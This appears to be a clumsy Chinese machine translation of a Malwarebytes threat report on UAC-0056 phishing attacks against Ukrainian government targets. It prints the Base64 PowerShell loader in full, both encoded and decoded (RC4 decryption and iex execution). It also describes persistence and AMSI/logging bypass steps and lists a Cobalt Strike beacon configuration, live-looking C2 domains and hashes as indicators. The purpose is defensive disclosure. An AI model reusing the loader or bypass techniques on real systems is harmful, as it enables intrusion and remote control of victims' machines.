钴再次罢工:UAC-0056 在其最新活动中继续以乌克兰为目标

上官雨宝2022-07-13 00:00:00

钴再次罢工:UAC-0056 在其最新活动中继续以乌克兰为目标

Malwarebytes 威胁情报团队最近审查了一系列针对乌克兰的网络攻击,我们高度相信这些攻击归因于 UAC-0056 (AKA UNC2589, TA471)。该威胁组织按照相同的通用策略、技术和程序 (TTP),通过网络钓鱼活动一再针对乌克兰的政府实体。

诱饵是基于与乌克兰正在发生的战争和人道主义灾难有关的重要事项。我们一直在密切监视这个威胁参与者,并注意到他们基于宏的文档以及他们的最终有效载荷发生了变化。

在本博客中,我们将连接我们和其他人(例如乌克兰 CERT)观察到的不同诱饵样本之间的点。我们还将分享同一威胁参与者在 6 月底执行的先前未记录的活动的指标。

不同的主题,相同的技巧

自从我们的博 文“房间里有一只围棋大象”发表以来,我们已经跟踪了几个新样本,如下面的时间线所示:

图 1:不同 UAC-0056 属性样本之间的关系

让我们进一步深入研究这些关系。UA-CERT 将名为“关于空缺可用性及其人员配置.xls 的信息”的文件归因于 UAC-0056。这个文件对我们来说看起来很熟悉,这是有充分理由的,因为该宏与我们在最初的博客中分析的文档几乎相同:

图 2:Vacancy 和 GoElephant dropper 宏的详细信息

在UA-CERT  (自 2022 年 2 月 24 日以来的乌克兰人道主义灾难.xls)报告的最近一次攻击 中,我们看到了与另一个名为Help Ukraine.xls的诱饵文档中使用的宏几乎相同的宏 :

图 3:帮助乌克兰和人道主义灾难宏的详细信息

据我们所知,帮助乌克兰的诱饵从未公开记录过:

图4:帮助乌克兰7月下旬使用的诱饵

我们能够识别出 7 个具有该主题的不同样本,其中一个(258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0)与之前的攻击有一些相似之处:

图 5:不同版本之间的相似之处

此外,过去我们发现了有关名为 ExcelVBA[.]ru 的域的评论。该文档正在联系一个名为 excel-vba[.]ru 的可疑相似域。

图 6:不同版本之间的相似性(2)

在受害者中,我们发现 gov.ua 电子邮件成为目标。上次竞选中用作电子邮件正文的文本之一是用乌克兰语编写的,翻译为:

2022 年 2 月 24 日,恐怖国家——俄罗斯联邦的军队介入乌克兰领土。为了反击俄罗斯政府的宣传,乌克兰总统办公室的国家统计局准备了一份关于乌克兰死亡公民、无家可归的乌克兰公民、公民的综合报告。乌克兰失去工作的人数,房屋被毁的数量,因侵略行为而被摧毁的企业的数量。该报告显示了按乌克兰地区细分的所有数据。熟悉你自己,让你的同事熟悉真实的事态。荣耀归于乌克兰
发送给受害者的原始电子邮件的翻译

我们将重点分析这 3 个较新的模板。确切的名称和路径来自024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1(关于空缺及其人员配备的信息)。该分析对其他人仍然有效,而样本之间存在微小变化。

写.bin

该文档将下载一个名为write.bin的可执行文件。遵循相同方案的其他攻击对该文件使用不同的名称,包括Office.exebaseupd.exeDataSource.exe。该文件略微混淆,并执行以下操作:

建立持久性

经过一些反调试技巧后,注册表项HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License用于建立持久性。HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, 首先检查,因为这是以前版本的恶意软件使用的密钥。

图 7:用于持久性的运行键

放弃下一阶段

下一步是将文件放到C:\ProgramData\TRYxaEbX中。这个文件以后会用到。

图 8:IDA Pro 中显示的 Powershell 命令行

有效负载将执行以下 powershell Base64 编码命令:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

图 9:编写可执行文件创建先前详细的 powershell 命令

之前的块是 Base64 编码的;解码为:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

简而言之,放入的文件 将使用 RC4 算法作为密钥C:\ProgramData\TRYxaEbX进行解密 。CmAJngvdDmiTjLxN下一个 PowerShell 脚本将如下所示:

图 10:解码的 PowerShell 阶段

在这里,我们可以看到将要采取的一些行动:

  • 禁用脚本日志记录
  • 禁用模块日志记录
  • 禁用转录
  • 禁用 AMSI 保护

在这一步之后,另一个 Base64 有效载荷被解码并执行:

图 11:最终的 PowerShell 脚本

部署 Cobalt Strike 有效载荷

可以看出,第二个 PowerShell 文件提供的主要功能是注入 shellcode。这个 shellcode 可以是 32 位或 64 位,并且是一个 Cobalt Strike 信标,具有以下配置:

          信标类型——HTTPS

港口               – 443

睡眠时间            – 30000

PublicKey_MD5        – defb5d95ce99e1ebbf421a1a38d9cb64

C2Server              – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

UserAgent             – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) 像 Gecko_10984gap

HttpPostUri           – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

水印           – 1580103824

通过在受害者的机器上运行 Cobalt Strike 实例,它现在已完全受到威胁。

攻击者探测沙箱

在撰写本文时,恶意 C&C 服务器似乎已关闭。但是,在 7 月 5 日,我们看到了活跃的服务器并成功连接到我们的测试环境。攻击者主动向机器发送侦察命令,列出几个文件夹的内容。

我们能够使用 Didier Steven 出色的Cobalt Strike 工具集来解码网络通信。

图 12:Cobalt Strike 通信解码

我们认为这些行动是初步行动,以检查机器是否是可行的目标,然后再跟进其他行动。

归因于 UAC-0056

根据 CERT UA 最近报告的攻击,以及博客开头指出的相似之处,我们可以高度肯定地将此攻击归因于 UAC-0056。

Cobalt Strike 信标中包含的签名(水印1580103824和公钥defb5d95ce99e1ebbf421a1a38d9cb64)可用于将攻击连接到其他组。例如 ,根据 CobaltStrike 文档,公钥在部署中应该是唯一的。

但是,重要的是要注意,在这种情况下,我们不能简单地依赖公钥来归因我们在本报告中分析的样本。事实上,这些签名被归因于许多不同的群体。我们的评估是,该组织使用了 Cobalt Strike 的泄露版本,并且使用了与其他人相同的私钥,这使得归属变得更加困难。

由于我们的反漏洞利用层,Malwarebytes 用户可以免受此活动的影响。

国际奥委会

恶意 Excel 文档(帮助乌克兰模板)

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3

c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a

1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532

258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0

e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386

ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff

eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

恶意 Excel 文档(人道主义模板)

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1

14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea

474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

有效载荷

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470

aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a

fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346

501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

Cobalt Strike 信标和有效载荷

136.144.41[.]177

syriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/

syriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/

skreatortemp[.]site

imolaoggi[.]eu

文章转自:alwaebytes LABS

本作品采用《CC 协议》,转载必须注明作者和本文链接
Malwarebytes 威胁情报团队最近审查了一系列针对乌克兰的网络攻击,我们高度相信这些攻击归因于 UAC-0056 (AKA UNC2589, TA471)。该威胁组织按照相同的通用策略、技术和程序 (TTP),通过网络钓鱼活动一再针对乌克兰的政府实体。
网络攻击十大目标行业:政府、通讯、银行、IT、酒店、航空、汽车、医疗、学校、关基。
今年以来,攻击面管理的相关技术探讨和行业热度快速上升,并被Gartner、Forrester等推荐为新兴技术
Android(安卓)智能手机的端点安全问题再次成为人们关注的焦点。
2019年2月,软件公司SolarWinds遭到名为Nobelium的疑似国家黑客组织的软件供应链攻击。该组织获得了对数千名SolarWinds客户的网络、系统和数据的访问权限,从而导致了有史以来最大规模的黑客攻击,根据事件的有关报道,微软产品的漏洞大大增加了SolarWinds攻击的破坏性。
2022年数字安全大事记
2023-01-06 11:11:30
数字安全已经成为国家安全有机且重要的组成部分。因此,2022年的增长率会进一步下降,预计约11%左右。黑客要求支付1500万美元的赎金。12月,蔚来汽车发布公告称,黑客以信息泄露为名勒索225万美元价值等额的比特币。经初步调查,蔚来汽车2021年8月之前的百万条用户基本信息和车辆销售信息遭窃。
出版业巨头麦克米伦(Macmillan)上周末遭勒索软件攻击,临时关闭系统网络。
这里是《微步一周荐读》,每周我们会从国内外网站筛选出最新、最具价值的安全资讯和技术文章,让大家每周只花5分钟,就能获得安全最新趋势解读。
上官雨宝
是水水水水是